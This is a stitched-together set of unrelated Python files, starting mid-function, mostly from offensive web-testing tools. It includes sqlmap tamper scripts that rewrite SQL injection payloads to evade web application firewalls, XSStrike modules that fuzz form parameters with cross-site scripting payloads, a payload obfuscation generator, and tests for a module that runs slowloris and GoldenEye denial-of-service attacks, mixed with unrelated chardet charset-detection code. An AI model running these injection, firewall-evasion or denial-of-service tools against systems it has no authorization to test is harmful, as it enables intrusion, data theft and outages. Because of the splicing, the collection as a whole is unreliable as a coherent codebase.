    >>> tamper('SLEEP(5)') == "GET_LOCK('%s',5)" % kb.aliasName
    True
    """

    if payload:
        payload = payload.replace("SLEEP(", "GET_LOCK('%s'," % kb.aliasName)

    return payload



import pytest
from unittest.mock import patch, Mock
from panthon.dos_attack import DoSAttack


def test_create_connection_success():
    with patch("panthon.dos_attack.socket.socket") as mock_socket:
        mock_socket_instance = Mock()
        mock_socket.return_value = mock_socket_instance

        dos = DoSAttack()
        dos.create_connection(url="http://localhost", target_port=8080)

        mock_socket_instance.connect.assert_called_once()
        mock_socket_instance.send.assert_called()
        mock_socket_instance.close.assert_called_once()


def test_create_connection_failure():
    with patch("panthon.dos_attack.socket.socket") as mock_socket:
        mock_socket_instance = Mock()
        mock_socket.return_value = mock_socket_instance
        mock_socket_instance.connect.side_effect = Exception("Mock Exception")

        dos = DoSAttack()
        dos.create_connection(url="http://localhost", target_port=8080)

        mock_socket_instance.close.assert_not_called()


def test_slowloris_attack_initial_connection():
    with patch("panthon.dos_attack.socket.socket") as mock_socket, patch(
        "panthon.dos_attack.read_user_agents", return_value=["UA1", "UA2"]
    ):
        mock_socket_instance = Mock()
        mock_socket.return_value = mock_socket_instance

        dos = DoSAttack()
        dos.slowloris_attack(
            url="http://localhost", target_port=8080, num_connections=2
        )

        mock_socket_instance.send.assert_called()
        assert mock_socket_instance.send.call_count == 2


# ... similarly for other methods ...


def test_goldeneye_attack():
    with patch("subprocess.run") as mock_subprocess:
        dos = DoSAttack()
        dos.goldeneye_attack(url="http://localhost")

        mock_subprocess.assert_called_once()



import random

import lib.settings


class PayloadGeneration(object):
    """Load the payloads into a set."""

    def __init__(self, templates, amount=10):
        self.templates = templates
        self.amount = amount

    def create_tampers(self):
        return lib.settings.load_tampers()

    def obfuscate_tampers(self, tampers):
        retval = set()
        for _ in range(self.amount):
            payload = random.choice(self.templates)
            for tamper in tampers:
                if tamper is not None:
                    payload = tamper.tamper(payload)
            retval.add(payload)
        return retval



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHEST


def dependencies():
    pass


def tamper(payload, **kwargs):
    """Replaces ORD() occurences with equivalent ASCII() calls.

    Requirement:
        * MySQL

    >>> tamper("ORD('42')")
    "ASCII('42')"
    """

    retVal = payload

    if payload:
        retVal = re.sub(r"(?i)\bORD\(", "ASCII(", payload)

    return retVal



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

import os
import random
import string

from lib.core.common import singleTimeWarnMessage
from lib.core.compat import xrange
from lib.core.enums import DBMS
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW


def dependencies():
    singleTimeWarnMessage(
        "tamper script '%s' is only meant to be run against %s"
        % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)
    )


def tamper(payload, **kwargs):
    """Replaces (MySQL) instances of space character (' ') with a pound
    character ('#') followed by a random string and a new line ('\n')

    Requirement:
        * MySQL

    Tested against:
        * MySQL 4.0, 5.0

    Notes:
        * Useful to bypass several web application firewalls
        * Used during the ModSecurity SQL injection challenge,
          http://modsecurity.org/demo/challenge.html

    >>> random.seed(0)
    >>> tamper('1 AND 9227=9227')
    '1%23upgPydUzKpMX%0AAND%23RcDKhIr%0A9227=9227'
    """

    retVal = ""

    if payload:
        for i in xrange(len(payload)):
            if payload[i].isspace():
                randomStr = "".join(
                    random.choice(string.ascii_uppercase + string.ascii_lowercase)
                    for _ in xrange(random.randint(6, 12))
                )
                retVal += "%%23%s%%0A" % randomStr
            elif payload[i] == "#" or payload[i : i + 3] == "-- ":
                retVal += payload[i:]
                break
            else:
                retVal += payload[i]

    return retVal



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

from plugins.generic.filesystem import Filesystem as GenericFilesystem


class Filesystem(GenericFilesystem):
    pass



######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
#   Mark Pilgrim - port to Python
#   Shy Shalom - original C code
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301  USA
######################### END LICENSE BLOCK #########################

from .charsetprober import CharSetProber
from .enums import ProbingState

FREQ_CAT_NUM = 4

UDF = 0  # undefined
OTH = 1  # other
ASC = 2  # ascii capital letter
ASS = 3  # ascii small letter
ACV = 4  # accent capital vowel
ACO = 5  # accent capital other
ASV = 6  # accent small vowel
ASO = 7  # accent small other
CLASS_NUM = 8  # total classes

Latin1_CharToClass = (
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,  # 00 - 07
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,  # 08 - 0F
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,  # 10 - 17
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,  # 18 - 1F
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,  # 20 - 27
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,  # 28 - 2F
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,  # 30 - 37
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,  # 38 - 3F
    OTH,
    ASC,
    ASC,
    ASC,
    ASC,
    ASC,
    ASC,
    ASC,  # 40 - 47
    ASC,
    ASC,
    ASC,
    ASC,
    ASC,
    ASC,
    ASC,
    ASC,  # 48 - 4F
    ASC,
    ASC,
    ASC,
    ASC,
    ASC,
    ASC,
    ASC,
    ASC,  # 50 - 57
    ASC,
    ASC,
    ASC,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,  # 58 - 5F
    OTH,
    ASS,
    ASS,
    ASS,
    ASS,
    ASS,
    ASS,
    ASS,  # 60 - 67
    ASS,
    ASS,
    ASS,
    ASS,
    ASS,
    ASS,
    ASS,
    ASS,  # 68 - 6F
    ASS,
    ASS,
    ASS,
    ASS,
    ASS,
    ASS,
    ASS,
    ASS,  # 70 - 77
    ASS,
    ASS,
    ASS,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,  # 78 - 7F
    OTH,
    UDF,
    OTH,
    ASO,
    OTH,
    OTH,
    OTH,
    OTH,  # 80 - 87
    OTH,
    OTH,
    ACO,
    OTH,
    ACO,
    UDF,
    ACO,
    UDF,  # 88 - 8F
    UDF,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,  # 90 - 97
    OTH,
    OTH,
    ASO,
    OTH,
    ASO,
    UDF,
    ASO,
    ACO,  # 98 - 9F
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,  # A0 - A7
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,  # A8 - AF
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,  # B0 - B7
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,
    OTH,  # B8 - BF
    ACV,
    ACV,
    ACV,
    ACV,
    ACV,
    ACV,
    ACO,
    ACO,  # C0 - C7
    ACV,
    ACV,
    ACV,
    ACV,
    ACV,
    ACV,
    ACV,
    ACV,  # C8 - CF
    ACO,
    ACO,
    ACV,
    ACV,
    ACV,
    ACV,
    ACV,
    OTH,  # D0 - D7
    ACV,
    ACV,
    ACV,
    ACV,
    ACV,
    ACO,
    ACO,
    ACO,  # D8 - DF
    ASV,
    ASV,
    ASV,
    ASV,
    ASV,
    ASV,
    ASO,
    ASO,  # E0 - E7
    ASV,
    ASV,
    ASV,
    ASV,
    ASV,
    ASV,
    ASV,
    ASV,  # E8 - EF
    ASO,
    ASO,
    ASV,
    ASV,
    ASV,
    ASV,
    ASV,
    OTH,  # F0 - F7
    ASV,
    ASV,
    ASV,
    ASV,
    ASV,
    ASO,
    ASO,
    ASO,  # F8 - FF
)

# 0 : illegal
# 1 : very unlikely
# 2 : normal
# 3 : very likely
Latin1ClassModel = (
    # UDF OTH ASC ASS ACV ACO ASV ASO
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,  # UDF
    0,
    3,
    3,
    3,
    3,
    3,
    3,
    3,  # OTH
    0,
    3,
    3,
    3,
    3,
    3,
    3,
    3,  # ASC
    0,
    3,
    3,
    3,
    1,
    1,
    3,
    3,  # ASS
    0,
    3,
    3,
    3,
    1,
    2,
    1,
    2,  # ACV
    0,
    3,
    3,
    3,
    3,
    3,
    3,
    3,  # ACO
    0,
    3,
    1,
    3,
    1,
    1,
    1,
    3,  # ASV
    0,
    3,
    1,
    3,
    1,
    1,
    3,
    3,  # ASO
)


class Latin1Prober(CharSetProber):
    def __init__(self):
        super(Latin1Prober, self).__init__()
        self._last_char_class = None
        self._freq_counter = None
        self.reset()

    def reset(self):
        self._last_char_class = OTH
        self._freq_counter = [0] * FREQ_CAT_NUM
        CharSetProber.reset(self)

    @property
    def charset_name(self):
        return "ISO-8859-1"

    @property
    def language(self):
        return ""

    def feed(self, byte_str):
        byte_str = self.filter_with_english_letters(byte_str)
        for c in byte_str:
            char_class = Latin1_CharToClass[c]
            freq = Latin1ClassModel[(self._last_char_class * CLASS_NUM) + char_class]
            if freq == 0:
                self._state = ProbingState.NOT_ME
                break
            self._freq_counter[freq] += 1
            self._last_char_class = char_class

        return self.state

    def get_confidence(self):
        if self.state == ProbingState.NOT_ME:
            return 0.01

        total = sum(self._freq_counter)
        if total < 0.01:
            confidence = 0.0
        else:
            confidence = (self._freq_counter[3] - self._freq_counter[1] * 20.0) / total
        if confidence < 0.0:
            confidence = 0.0
        # lower the confidence of latin1 so that other more accurate
        # detector can take priority.
        confidence = confidence * 0.73
        return confidence



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW


def tamper(payload, **kwargs):
    """Replaces space character (' ') with a pound character ('#') followed by
    a new line ('\n')

    Requirement:
        * MSSQL
        * MySQL

    Notes:
        * Useful to bypass several web application firewalls

    >>> tamper('1 AND 9227=9227')
    '1%23%0AAND%23%0A9227=9227'
    """

    retVal = ""

    if payload:
        for i in xrange(len(payload)):
            if payload[i].isspace():
                retVal += "%23%0A"
            elif payload[i] == "#" or payload[i : i + 3] == "-- ":
                retVal += payload[i:]
                break
            else:
                retVal += payload[i]

    return retVal



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

import os
import string

from lib.core.common import singleTimeWarnMessage
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW


def dependencies():
    singleTimeWarnMessage(
        "tamper script '%s' is only meant to be run against ASP web applications"
        % os.path.basename(__file__).split(".")[0]
    )


def tamper(payload, **kwargs):
    """Adds a percentage sign ('%') infront of each character (e.g. SELECT ->
    %S%E%L%E%C%T)

    Requirement:
        * ASP

    Tested against:
        * Microsoft SQL Server 2000, 2005
        * MySQL 5.1.56, 5.5.11
        * PostgreSQL 9.0

    Notes:
        * Useful to bypass weak and bespoke web application firewalls

    >>> tamper('SELECT FIELD FROM TABLE')
    '%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E'
    """

    if payload:
        retVal = ""
        i = 0

        while i < len(payload):
            if (
                payload[i] == "%"
                and (i < len(payload) - 2)
                and payload[i + 1 : i + 2] in string.hexdigits
                and payload[i + 2 : i + 3] in string.hexdigits
            ):
                retVal += payload[i : i + 3]
                i += 3
            elif payload[i] != " ":
                retVal += "%%%s" % payload[i]
                i += 1
            else:
                retVal += payload[i]
                i += 1

    return retVal



######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
#   Mark Pilgrim - port to Python
#   Shy Shalom - original C code
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301  USA
######################### END LICENSE BLOCK #########################

from .charsetprober import CharSetProber
from .enums import CharacterCategory, ProbingState, SequenceLikelihood


class SingleByteCharSetProber(CharSetProber):
    SAMPLE_SIZE = 64
    SB_ENOUGH_REL_THRESHOLD = 1024  #  0.25 * SAMPLE_SIZE^2
    POSITIVE_SHORTCUT_THRESHOLD = 0.95
    NEGATIVE_SHORTCUT_THRESHOLD = 0.05

    def __init__(self, model, reversed=False, name_prober=None):
        super(SingleByteCharSetProber, self).__init__()
        self._model = model
        # TRUE if we need to reverse every pair in the model lookup
        self._reversed = reversed
        # Optional auxiliary prober for name decision
        self._name_prober = name_prober
        self._last_order = None
        self._seq_counters = None
        self._total_seqs = None
        self._total_char = None
        self._freq_char = None
        self.reset()

    def reset(self):
        super(SingleByteCharSetProber, self).reset()
        # char order of last character
        self._last_order = 255
        self._seq_counters = [0] * SequenceLikelihood.get_num_categories()
        self._total_seqs = 0
        self._total_char = 0
        # characters that fall in our sampling range
        self._freq_char = 0

    @property
    def charset_name(self):
        if self._name_prober:
            return self._name_prober.charset_name
        else:
            return self._model["charset_name"]

    @property
    def language(self):
        if self._name_prober:
            return self._name_prober.language
        else:
            return self._model.get("language")

    def feed(self, byte_str):
        if not self._model["keep_english_letter"]:
            byte_str = self.filter_international_words(byte_str)
        if not byte_str:
            return self.state
        char_to_order_map = self._model["char_to_order_map"]
        for i, c in enumerate(byte_str):
            # XXX: Order is in range 1-64, so one would think we want 0-63 here,
            #      but that leads to 27 more test failures than before.
            order = char_to_order_map[c]
            # XXX: This was SYMBOL_CAT_ORDER before, with a value of 250, but
            #      CharacterCategory.SYMBOL is actually 253, so we use CONTROL
            #      to make it closer to the original intent. The only difference
            #      is whether or not we count digits and control characters for
            #      _total_char purposes.
            if order < CharacterCategory.CONTROL:
                self._total_char += 1
            if order < self.SAMPLE_SIZE:
                self._freq_char += 1
                if self._last_order < self.SAMPLE_SIZE:
                    self._total_seqs += 1
                    if not self._reversed:
                        i = (self._last_order * self.SAMPLE_SIZE) + order
                        model = self._model["precedence_matrix"][i]
                    else:  # reverse the order of the letters in the lookup
                        i = (order * self.SAMPLE_SIZE) + self._last_order
                        model = self._model["precedence_matrix"][i]
                    self._seq_counters[model] += 1
            self._last_order = order

        charset_name = self._model["charset_name"]
        if self.state == ProbingState.DETECTING:
            if self._total_seqs > self.SB_ENOUGH_REL_THRESHOLD:
                confidence = self.get_confidence()
                if confidence > self.POSITIVE_SHORTCUT_THRESHOLD:
                    self.logger.debug(
                        "%s confidence = %s, we have a winner", charset_name, confidence
                    )
                    self._state = ProbingState.FOUND_IT
                elif confidence < self.NEGATIVE_SHORTCUT_THRESHOLD:
                    self.logger.debug(
                        "%s confidence = %s, below negative shortcut threshhold %s",
                        charset_name,
                        confidence,
                        self.NEGATIVE_SHORTCUT_THRESHOLD,
                    )
                    self._state = ProbingState.NOT_ME

        return self.state

    def get_confidence(self):
        r = 0.01
        if self._total_seqs > 0:
            r = (
                (1.0 * self._seq_counters[SequenceLikelihood.POSITIVE])
                / self._total_seqs
                / self._model["typical_positive_ratio"]
            )
            r = r * self._freq_char / self._total_char
            if r >= 1.0:
                r = 0.99
        return r



import copy
import re

import core.config
from core.colors import green, end
from core.config import xsschecker
from core.filterChecker import filterChecker
from core.generator import generator
from core.htmlParser import htmlParser
from core.requester import requester
from core.log import setup_logger

logger = setup_logger(__name__)


def crawl(
    scheme,
    host,
    main_url,
    form,
    blindXSS,
    blindPayload,
    headers,
    delay,
    timeout,
    encoding,
):
    if form:
        for each in form.values():
            url = each["action"]
            if url:
                if url.startswith(main_url):
                    pass
                elif url.startswith("//") and url[2:].startswith(host):
                    url = scheme + "://" + url[2:]
                elif url.startswith("/"):
                    url = scheme + "://" + host + url
                elif re.match(r"\w", url[0]):
                    url = scheme + "://" + host + "/" + url
                if url not in core.config.globalVariables["checkedForms"]:
                    core.config.globalVariables["checkedForms"][url] = []
                method = each["method"]
                GET = True if method == "get" else False
                inputs = each["inputs"]
                paramData = {}
                for one in inputs:
                    paramData[one["name"]] = one["value"]
                    for paramName in paramData.keys():
                        if (
                            paramName
                            not in core.config.globalVariables["checkedForms"][url]
                        ):
                            core.config.globalVariables["checkedForms"][url].append(
                                paramName
                            )
                            paramsCopy = copy.deepcopy(paramData)
                            paramsCopy[paramName] = xsschecker
                            response = requester(
                                url, paramsCopy, headers, GET, delay, timeout
                            )
                            occurences = htmlParser(response, encoding)
                            occurences.keys()
                            occurences = filterChecker(
                                url,
                                paramsCopy,
                                headers,
                                GET,
                                delay,
                                occurences,
                                timeout,
                                encoding,
                            )
                            vectors = generator(occurences, response.text)
                            if vectors:
                                for confidence, vects in vectors.items():
                                    try:
                                        payload = list(vects)[0]
                                        logger.vuln(
                                            "Vulnerable webpage: %s%s%s"
                                            % (green, url, end)
                                        )
                                        logger.vuln(
                                            "Vector for %s%s%s: %s"
                                            % (green, paramName, end, payload)
                                        )
                                        break
                                    except IndexError:
                                        pass
                            if blindXSS and blindPayload:
                                paramsCopy[paramName] = blindPayload
                                requester(url, paramsCopy, headers, GET, delay, timeout)



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

import sys

sys.dont_write_bytecode = True

__import__("lib.utils.versioncheck")  # this has to be the first non-standard import

import logging
import optparse
import os
import warnings

warnings.filterwarnings(action="ignore", category=UserWarning)
warnings.filterwarnings(action="ignore", category=DeprecationWarning)

from lib.core.common import getUnicode
from lib.core.common import setPaths
from lib.core.data import logger
from lib.core.patch import dirtyPatches
from lib.core.patch import resolveCrossReferences
from lib.core.settings import RESTAPI_DEFAULT_ADAPTER
from lib.core.settings import RESTAPI_DEFAULT_ADDRESS
from lib.core.settings import RESTAPI_DEFAULT_PORT
from lib.core.settings import UNICODE_ENCODING
from lib.utils.api import client
from lib.utils.api import server

try:
    from sqlmap import modulePath
except ImportError:

    def modulePath():
        return getUnicode(
            os.path.dirname(os.path.realpath(__file__)),
            encoding=sys.getfilesystemencoding() or UNICODE_ENCODING,
        )


def main():
    """REST-JSON API main function."""

    dirtyPatches()
    resolveCrossReferences()

    # Set default logging level to debug
    logger.setLevel(logging.DEBUG)

    # Initialize paths
    setPaths(modulePath())

    # Parse command line options
    apiparser = optparse.OptionParser()
    apiparser.add_option(
        "-s", "--server", help="Run as a REST-JSON API server", action="store_true"
    )
    apiparser.add_option(
        "-c", "--client", help="Run as a REST-JSON API client", action="store_true"
    )
    apiparser.add_option(
        "-H",
        "--host",
        help='Host of the REST-JSON API server (default "%s")'
        % RESTAPI_DEFAULT_ADDRESS,
        default=RESTAPI_DEFAULT_ADDRESS,
        action="store",
    )
    apiparser.add_option(
        "-p",
        "--port",
        help="Port of the the REST-JSON API server (default %d)" % RESTAPI_DEFAULT_PORT,
        default=RESTAPI_DEFAULT_PORT,
        type="int",
        action="store",
    )
    apiparser.add_option(
        "--adapter",
        help='Server (bottle) adapter to use (default "%s")' % RESTAPI_DEFAULT_ADAPTER,
        default=RESTAPI_DEFAULT_ADAPTER,
        action="store",
    )
    apiparser.add_option(
        "--username", help="Basic authentication username (optional)", action="store"
    )
    apiparser.add_option(
        "--password", help="Basic authentication password (optional)", action="store"
    )
    (args, _) = apiparser.parse_args()

    # Start the client or the server
    if args.server:
        server(
            args.host,
            args.port,
            adapter=args.adapter,
            username=args.username,
            password=args.password,
        )
    elif args.client:
        client(args.host, args.port, username=args.username, password=args.password)
    else:
        apiparser.print_help()


if __name__ == "__main__":
    main()



"""
XSSCon - 2019/2020
This project was created by menkrep1337 with 407Aex team.
Copyright under the MIT license
"""

import requests, json

##### Warna #######
N = "\033[0m"
W = "\033[1;37m"
B = "\033[1;34m"
M = "\033[1;35m"
R = "\033[1;31m"
G = "\033[1;32m"
Y = "\033[1;33m"
C = "\033[1;36m"
##### Styling ######
underline = "\033[4m"
##### Default ######
agent = {
    "User-Agent": (
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML,"
        " like Gecko) Chrome/39.0.2171.95 Safari/537.36"
    )
}
line = "—————————————————"


#####################
def session(proxies, headers, cookie):
    r = requests.Session()
    r.proxies = proxies
    r.headers = headers
    r.cookies.update(json.loads(cookie))
    return r


logo = ""



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

try:
    import prestodb
except:
    pass

import logging
import struct

from lib.core.common import getSafeExString
from lib.core.data import conf
from lib.core.data import logger
from lib.core.exception import SqlmapConnectionException
from plugins.generic.connector import Connector as GenericConnector


class Connector(GenericConnector):
    """
    Homepage: https://github.com/prestodb/presto-python-client
    User guide: https://github.com/prestodb/presto-python-client/blob/master/README.md
    API: https://www.python.org/dev/peps/pep-0249/
    PyPI package: presto-python-client
    License: Apache License 2.0
    """

    def connect(self):
        self.initConnection()

        try:
            self.connector = prestodb.dbapi.connect(
                host=self.hostname,
                user=self.user,
                catalog=self.db,
                port=self.port,
                request_timeout=conf.timeout,
            )
        except (
            prestodb.exceptions.OperationalError,
            prestodb.exceptions.InternalError,
            prestodb.exceptions.ProgrammingError,
            struct.error,
        ) as ex:
            raise SqlmapConnectionException(getSafeExString(ex))

        self.initCursor()
        self.printConnected()

    def fetchall(self):
        try:
            return self.cursor.fetchall()
        except prestodb.exceptions.ProgrammingError as ex:
            logger.log(
                logging.WARN if conf.dbmsHandler else logging.DEBUG,
                "(remote) %s" % getSafeExString(ex),
            )
            return None

    def execute(self, query):
        retVal = False

        try:
            self.cursor.execute(query)
            retVal = True
        except (
            prestodb.exceptions.OperationalError,
            prestodb.exceptions.ProgrammingError,
        ) as ex:
            logger.log(
                logging.WARN if conf.dbmsHandler else logging.DEBUG,
                "(remote) %s" % getSafeExString(ex),
            )
        except prestodb.exceptions.InternalError as ex:
            raise SqlmapConnectionException(getSafeExString(ex))

        self.connector.commit()

        return retVal

    def select(self, query):
        retVal = None

        if self.execute(query):
            retVal = self.fetchall()

        return retVal



import copy
from urllib.parse import urlparse, unquote

from core.colors import good, green, end
from core.requester import requester
from core.utils import getUrl, getParams
from core.log import setup_logger

logger = setup_logger(__name__)


def bruteforcer(target, paramData, payloadList, encoding, headers, delay, timeout):
    GET, POST = (False, True) if paramData else (True, False)
    host = urlparse(target).netloc  # Extracts host out of the url
    logger.debug("Parsed host to bruteforce: {}".format(host))
    url = getUrl(target, GET)
    logger.debug("Parsed url to bruteforce: {}".format(url))
    params = getParams(target, paramData, GET)
    logger.debug_json("Bruteforcer params:", params)
    if not params:
        logger.error("No parameters to test.")
        quit()
    for paramName in params.keys():
        progress = 1
        paramsCopy = copy.deepcopy(params)
        for payload in payloadList:
            logger.run(
                "Bruteforcing %s[%s%s%s]%s: %i/%i\r"
                % (green, end, paramName, green, end, progress, len(payloadList))
            )
            if encoding:
                payload = encoding(unquote(payload))
            paramsCopy[paramName] = payload
            response = requester(url, paramsCopy, headers, GET, delay, timeout).text
            if encoding:
                payload = encoding(payload)
            if payload in response:
                logger.info("%s %s" % (good, payload))
            progress += 1
    logger.no_format("")



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.filesystem import Filesystem as GenericFilesystem


class Filesystem(GenericFilesystem):
    def readFile(self, remoteFile):
        errMsg = "on H2 it is not possible to read files"
        raise SqlmapUnsupportedFeatureException(errMsg)

    def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
        errMsg = "on H2 it is not possible to write files"
        raise SqlmapUnsupportedFeatureException(errMsg)



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

try:
    import ibm_db_dbi
except:
    pass

import logging

from lib.core.common import getSafeExString
from lib.core.data import conf
from lib.core.data import logger
from lib.core.exception import SqlmapConnectionException
from plugins.generic.connector import Connector as GenericConnector


class Connector(GenericConnector):
    """
    Homepage: https://github.com/ibmdb/python-ibmdb
    User guide: https://github.com/ibmdb/python-ibmdb/wiki/README
    API: https://www.python.org/dev/peps/pep-0249/
    License: Apache License 2.0
    """

    def connect(self):
        self.initConnection()

        try:
            database = "DATABASE=%s;HOSTNAME=%s;PORT=%s;PROTOCOL=TCPIP;" % (
                self.db,
                self.hostname,
                self.port,
            )
            self.connector = ibm_db_dbi.connect(database, self.user, self.password)
        except ibm_db_dbi.OperationalError as ex:
            raise SqlmapConnectionException(getSafeExString(ex))

        self.initCursor()
        self.printConnected()

    def fetchall(self):
        try:
            return self.cursor.fetchall()
        except ibm_db_dbi.ProgrammingError as ex:
            logger.log(
                logging.WARN if conf.dbmsHandler else logging.DEBUG,
                "(remote) %s" % getSafeExString(ex),
            )
            return None

    def execute(self, query):
        try:
            self.cursor.execute(query)
        except (ibm_db_dbi.OperationalError, ibm_db_dbi.ProgrammingError) as ex:
            logger.log(
                logging.WARN if conf.dbmsHandler else logging.DEBUG,
                "(remote) %s" % getSafeExString(ex),
            )
        except ibm_db_dbi.InternalError as ex:
            raise SqlmapConnectionException(getSafeExString(ex))

        self.connector.commit()

    def select(self, query):
        self.execute(query)
        return self.fetchall()



import os
import re
from requests import get

from core.config import changes
from core.colors import que, info, end, green
from core.log import setup_logger

logger = setup_logger(__name__)


def updater():
    logger.run("Checking for updates")
    latestCommit = get(
        "https://raw.githubusercontent.com/s0md3v/XSStrike/master/core/config.py"
    ).text

    if changes not in latestCommit:  # just a hack to see if a new version is available
        changelog = re.search(r"changes = '''(.*?)'''", latestCommit)
        changelog = changelog.group(1).split(
            ";"
        )  # splitting the changes to form a list
        logger.good("A new version of XSStrike is available.")
        changes_str = "Changes:\n"
        for change in changelog:  # prepare changes to print
            changes_str += "%s>%s %s\n" % (green, end, change)
        logger.info(changes_str)
        currentPath = os.getcwd().split("/")  # if you know it, you know it
        folder = currentPath[-1]  # current directory name
        path = "/".join(currentPath)  # current directory path
        choice = input("%s Would you like to update? [Y/n] " % que).lower()

        if choice != "n":
            logger.run("Updating XSStrike")
            os.system(
                "git clone --quiet https://github.com/s0md3v/XSStrike %s" % (folder)
            )
            os.system(
                "cp -r %s/%s/* %s && rm -r %s/%s/ 2>/dev/null"
                % (path, folder, path, path, folder)
            )
            logger.good("Update successful!")
    else:
        logger.good("XSStrike is up to date!")



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""


class SqlmapBaseException(Exception):
    pass


class SqlmapCompressionException(SqlmapBaseException):
    pass


class SqlmapConnectionException(SqlmapBaseException):
    pass


class SqlmapDataException(SqlmapBaseException):
    pass


class SqlmapFilePathException(SqlmapBaseException):
    pass


class SqlmapGenericException(SqlmapBaseException):
    pass


class SqlmapInstallationException(SqlmapBaseException):
    pass


class SqlmapMissingDependence(SqlmapBaseException):
    pass


class SqlmapMissingMandatoryOptionException(SqlmapBaseException):
    pass


class SqlmapMissingPrivileges(SqlmapBaseException):
    pass


class SqlmapNoneDataException(SqlmapBaseException):
    pass


class SqlmapNotVulnerableException(SqlmapBaseException):
    pass


class SqlmapSilentQuitException(SqlmapBaseException):
    pass


class SqlmapUserQuitException(SqlmapBaseException):
    pass


class SqlmapShellQuitException(SqlmapBaseException):
    pass


class SqlmapSkipTargetException(SqlmapBaseException):
    pass


class SqlmapSyntaxException(SqlmapBaseException):
    pass


class SqlmapSystemException(SqlmapBaseException):
    pass


class SqlmapThreadException(SqlmapBaseException):
    pass


class SqlmapTokenException(SqlmapBaseException):
    pass


class SqlmapUndefinedMethod(SqlmapBaseException):
    pass


class SqlmapUnsupportedDBMSException(SqlmapBaseException):
    pass


class SqlmapUnsupportedFeatureException(SqlmapBaseException):
    pass


class SqlmapValueException(SqlmapBaseException):
    pass
